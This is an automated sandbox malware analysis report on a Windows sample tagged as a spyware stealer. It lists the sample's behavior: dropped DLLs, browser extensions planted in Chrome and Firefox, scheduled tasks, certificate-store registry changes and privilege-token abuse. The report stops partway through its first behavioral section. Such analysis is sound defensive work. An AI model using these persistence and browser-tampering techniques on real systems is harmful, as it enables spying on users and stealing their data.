Malware Analysis Report

2025-06-15 19:50

Sample ID 240406-fm56dabh88
Target 0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184
SHA256 0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184
Tags
discovery spyware stealer
Score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score
8/10

SHA256

0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184

Threat Level: Likely malicious

The file 0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184 was found to be: Likely malicious.

Malicious Activity Summary

discovery spyware stealer

Blocklisted process makes network request

Checks BIOS information in registry

Executes dropped EXE

Reads user/profile data of web browsers

Checks computer location settings

Loads dropped DLL

Checks installed software on the system

Drops Chrome extension

Drops desktop.ini file(s)

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Creates scheduled task(s)

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-06 05:00

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-06 05:00

Reported

2024-04-06 05:03

Platform

win10v2004-20240226-en

Max time kernel

125s

Max time network

132s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\ENTxXds.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\ENTxXds.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File created C:\Program Files (x86)\fZHZowTYSgfU2\KEmXDcEBYdtZj.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File created C:\Program Files (x86)\qBvbbKpBU\EXcBdZ.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File created C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\QKJRxWV.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File created C:\Program Files (x86)\epUZFeichsCPC\vQDomDF.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File created C:\Program Files (x86)\VDiAXGzPiWUn\XlrWwuo.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File created C:\Program Files (x86)\qBvbbKpBU\cLAALdr.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File created C:\Program Files (x86)\fZHZowTYSgfU2\jQhmmpX.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File created C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\VGwavyx.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File created C:\Program Files (x86)\epUZFeichsCPC\zcKfbEk.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bpJjqbWMDOjxkYrvBb.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\MWViHNuTpmRlpInKg.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\wbeMFPOaxEodGIM.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\BinjFlxHFUMMGNOij.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\ENTxXds.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "1" C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\ENTxXds.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
